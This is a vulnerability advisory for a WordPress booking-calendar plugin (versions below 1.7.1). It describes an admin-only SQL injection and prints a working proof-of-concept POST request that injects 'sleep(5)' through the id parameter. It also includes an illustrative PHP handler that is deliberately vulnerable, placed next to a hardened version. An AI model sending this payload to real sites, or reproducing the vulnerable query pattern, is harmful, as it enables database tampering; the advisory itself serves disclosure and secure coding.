wpexploit | YICHENG LIU-ZTE CHENFENG lab | WPEX-ID:C5569317-B8C8-4524-8375-3E2369BDCC68
History: Mar 21, 2022 - 12:00 a.m.

Advanced Booking Calendar < 1.7.1 - Admin+ SQLi

2022-03-21 00:00:00
YICHENG LIU-ZTE CHENFENG lab
79

EPSS: 0.001 (Low), Percentile: 41.2%

The plugin does not sanitise and escape the id parameter when editing Calendars, which could allow high-privilege users such as admin to perform SQL injection attacks.

Edit an existing calendar on the Seasons & Calendars page (/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars) and tamper with the id parameter:

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://192.168.9.32
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test&maxAvailabilities=1&maxUnits=5&pricePreset=9000&minimumStayPreset=1&partlyBooked=1&page_id=0&infotext=
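The advisory does not show the plugin's source, so the following is an added illustration of the defect class it describes and the WordPress-idiomatic remedy; it is not the plugin's code and not the fix shipped in 1.7.1. The handler names, the table name `abc_calendars`, its columns and the nonce action are assumptions chosen for the example. The first handler interpolates the raw `id` into the query, so the `1 and sleep(5)` value from the request above becomes SQL; the second coerces `id` to an integer, binds both values through `$wpdb->prepare()`, and checks the nonce and the caller's capability before touching the database.

```php
<?php
// Added illustration, not the plugin's code. Handler names, the table
// name and its columns are assumptions standing in for the real ones.

// Vulnerable pattern: the id and name parameters are pasted into the
// query unchanged. A value such as "1 and sleep(5)" is executed as SQL.
// No nonce or capability check guards the handler either.
function abc_demo_edit_calendar_vulnerable() {
    global $wpdb;
    $id   = $_POST['id'];
    $name = $_POST['name'];
    $wpdb->query(
        "UPDATE {$wpdb->prefix}abc_calendars SET name = '$name' WHERE id = $id"
    );
}

// Hardened pattern: id is coerced to a non-negative integer, name is
// sanitised, both are bound through $wpdb->prepare(), and the handler
// verifies the nonce and the caller's capability first.
function abc_demo_edit_calendar_hardened() {
    global $wpdb;

    // Nonce action name is an assumption for this example.
    check_admin_referer( 'abc_demo_edit_calendar' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }

    // absint() turns "1 and sleep(5)" into 1; anything non-numeric becomes 0.
    $id   = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    $name = isset( $_POST['name'] )
        ? sanitize_text_field( wp_unslash( $_POST['name'] ) )
        : '';

    if ( 0 === $id ) {
        wp_die( 'Invalid calendar id.' );
    }

    // %d forces an integer placeholder, %s a quoted and escaped string.
    $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$wpdb->prefix}abc_calendars SET name = %s WHERE id = %d",
            $name,
            $id
        )
    );
}

// admin-post.php routes action=abc_booking_editCalendar to this hook for
// logged-in users, matching the action value in the request above.
add_action( 'admin_post_abc_booking_editCalendar', 'abc_demo_edit_calendar_hardened' );
```

With the hardened handler the request body shown above updates calendar 1 and nothing else: the `and sleep(5)` suffix is discarded by `absint()` before the query is built, and `%d` would reject it even if it reached `prepare()`. Type coercion at the boundary plus parameter binding is the check to look for when reviewing any admin-post handler, since an "admin-only" SQL injection still lets an account that should only manage content read or alter arbitrary tables.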

